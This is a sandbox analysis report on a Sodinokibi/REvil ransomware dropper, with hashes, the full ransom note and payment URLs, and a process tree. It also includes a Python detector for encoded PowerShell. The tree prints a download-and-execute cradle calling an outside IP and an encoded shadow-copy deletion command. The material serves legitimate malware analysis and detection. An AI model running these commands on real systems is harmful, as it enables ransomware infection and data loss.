Analysis

  • max time kernel
    142s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    29-02-2020 23:10

General

  • Target

    GxdgNtfB.bat

  • Size

    192B

  • MD5

    d40190448142e92524fc41e756e185b6

  • SHA1

    399ead1022291c86a66bf5bfcf1e7229287b5721

  • SHA256

    7d300da6df98325755580525ea2039cd8d4c9420557fb992d83440840bdcbd25

  • SHA512

    90361f11344ac7acbb897c55ffeddbc8695130c75e05b909bd72652f024416ffe8fc7f1040affa5dcf68f7e0c48958695ad85a928a323fb4bab671b4df5170b8

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/GxdgNtfB

Extracted

Path

C:\lqdsy55g-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension lqdsy55g. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/43E3E340647DF886 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/43E3E340647DF886 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: BGXCSLIHW5L8q3vuJ1B+xKfHEIduq94RBq9GDHkOkUZzkQJn/abr8PfnAOUJ0Dii f5oBAiFGaE2KNmM3sVthI63W/HyYbfx3oIQpq1nd8he9GpNzTX/6O4jaIEpKZMwf R8DR9U2wrM95qOi96ZNwoEkpiF4wQAzGEAG7fIO3CyUsuRYOEyUaG3HCX1jDpDue fL7FMPwYrHEJHLUgF6DmZaKcjvInvAp/ruQW/pk/aErtEe9VA1l8U9NpJlshEWia KA01ctMntfHYVI6w3wR52dIVk7O1icxhg9IXNRZW8Vt6cVi8YuBYu8rteDFApKDU U/IhPzIK11jGv1LbnYw5EPeI8o0nY9Ay9vl2tYGmoFQ2G/Y8CyxdFOXLJK5lJJo8 iQ1X/TYzJOW02Kk6Us+HsQ28HLleWuliHyfq0G3Foa4knZLYVZnIBvTF3b/1qYU5 x7pSj0rtiBV1o8Zd52gLKZCab83PM6J5j17q9gBSRkZUAS2yPkbABBeciZoYAVsE Tn26xhN6jhfu0cH/7D8t8cOB0dOxYcuvvWMATAVaNeZiyAr17avMi22GsWnJKdZ+ 7UKgXLZ0kdHcEeSaoZ+t4F51STyYhHMAsEFTRpU6VaXLygfBjnjkt3GDD+ceXODe A/nR6LE5PCnJrtnzeApEKdJLWKUgJPveyzoLiRSQ4192eKip808XRlu5Hj/6Mh6r PC5GCWfsK9M1OJpWxdCxTvzWYJSKboSDEtHnR0i8Z6+Qjc9gCGK7zfL+t8GQam7r 2qzx+HEMKPsIbjC3s16UY4k8nR0ER/IDMUVKSMabswGlrLL9qqOd9OY4KA5ccPoP RaBx+BLyeaUZ5+h8Vi9D9c6PQqaFmBbg37QkllktmAQK23MPKHqaa9uINBIWHAfZ gYFCvkfArOVhcNsbnc7qY8XRnOjXRK0a8VE/yEpioNNvm90q7RuUeBOxTWCV/2w0 10I6dSz/878sXSyXBKhgsuGNkx6S7xLXGwP6urvEmrd8ae1lWh1c72AZQTStbBmx Oa7Q6ngZXEMymJKG3a3/R5p2aMKcUiqLot0Ep5LYrfzIECexC45zTAgfiY3AvHGK LIT/1OfD3fdFyrZ9Oz1ATO2VBQwBVeeNT9dtSBQQc+ukicVCHCr82Y9JOQc1hdhw vJWEaHp9o2G1qgos4RhKmz9OY+lPnHuIkley3prtJOsCJJmm6FHrMshrEOFr4JzI XE1Lp1HTlNyPw7RuTGDvrZVc0K6lYckbt4ElJOGm0Lqk0THsYSfKQX+c/E1UKrKx XlqZlxCCQfnzo/aBdEt1cj2bz566NqMdAlrTbaEHgoPm+Joo ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/43E3E340647DF886

http://decryptor.cc/43E3E340647DF886

Signatures

  • Discovering connected drives 3 TTPs 7 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Blacklisted process makes network request 121 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\GxdgNtfB.bat"
    1⤵
    • Discovering connected drives
    • Suspicious use of WriteProcessMemory
    PID:1904
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/GxdgNtfB');Invoke-YDVXUJVMC;Start-Sleep -s 10000"
      2⤵
      • Discovering connected drives
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Drops file in System32 directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:1928
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Discovering connected drives
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:2028
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1556
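The process tree above shows the two PowerShell stages that matter for triage: a download cradle (`IEX (New-Object System.Net.WebClient).DownloadString(...)`) fetching the next stage from 185.103.242.78, and a child `powershell -e <base64>` whose payload is base64 of UTF-16LE script text. The following helper, an added example and not Triage's own signature code, decodes the `-EncodedCommand` argument and scans both the raw command line and the decoded payload for the download cradle and for shadow-copy deletion. The three sample command lines are constructed from the Processes section above; the flag-prefix handling and the regexes are this example's own heuristics, not a published rule set.

```python
import base64
import binascii
import re

# Constructed sample input: the three command lines from the process tree above.
SAMPLE_CMDLINES = [
    'cmd /c "C:\\Users\\Admin\\AppData\\Local\\Temp\\GxdgNtfB.bat"',
    'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe '
    '"IEX (New-Object System.Net.WebClient).DownloadString('
    "'http://185.103.242.78/pastes/GxdgNtfB');Invoke-YDVXUJVMC;Start-Sleep -s 10000\"",
    "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3"
    "AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABl"
    "AHQAZQAoACkAOwB9AA==",
]

URL_RE = re.compile(r"https?://[^\s'\")]+")
# A cradle is an expression evaluator fed by a downloader in the same command.
EVALUATOR_RE = re.compile(r"(?i)(?<![\w-])(?:IEX|Invoke-Expression)(?![\w-])")
DOWNLOADER_RE = re.compile(
    r"(?i)(?:DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|"
    r"Invoke-RestMethod|(?<![\w-])iwr(?![\w-])|Net\.WebClient)"
)
# Shadow-copy deletion via WMI (as in this sample), vssadmin, or wmic.
SHADOW_RE = re.compile(
    r"(?i)(?:Win32_ShadowCopy.*Delete|vssadmin(?:\.exe)?\s+delete\s+shadows|"
    r"wmic(?:\.exe)?\s+shadowcopy\s+delete)"
)


def is_encoded_flag(token):
    """True for -e, -ec and longer prefixes of -EncodedCommand.

    powershell.exe documents -e and -ec as aliases; accepting -enc and longer
    prefixes is this example's assumption about what the loader tolerates.
    """
    t = token.lower()
    if not t.startswith("-") or len(t) < 2:
        return False
    name = t[1:]
    return name in ("e", "ec") or (len(name) >= 3 and "encodedcommand".startswith(name))


def decode_encoded_command(b64):
    """-EncodedCommand takes base64 of the UTF-16LE script text; None if malformed."""
    try:
        raw = base64.b64decode(b64, validate=True)
        return raw.decode("utf-16-le").rstrip("\x00")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def extract_encoded(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the line has none."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            return decode_encoded_command(tokens[i + 1])
    return None


def analyze_cmdline(cmdline):
    """Classify one process command line; the decoded payload is scanned as well."""
    decoded = extract_encoded(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    indicators = []
    if EVALUATOR_RE.search(text) and DOWNLOADER_RE.search(text):
        indicators.append("download_cradle")
    if SHADOW_RE.search(text):
        indicators.append("shadow_copy_deletion")
    if decoded is not None:
        indicators.append("encoded_command")
    return {"decoded": decoded, "indicators": indicators, "urls": URL_RE.findall(text)}


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = analyze_cmdline(line)
        print(result["indicators"], result["urls"], result["decoded"])
```

Run against the third sample line, the decoder yields `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, which is why that child process carries the "Suspicious use of AdjustPrivilegeToken" signature and why vssvc.exe appears in the tree. Scanning the decoded text rather than only the raw command line is the point: a rule that keyed on the literal `Win32_Shadowcopy` would never fire on the base64 form.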

Network

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms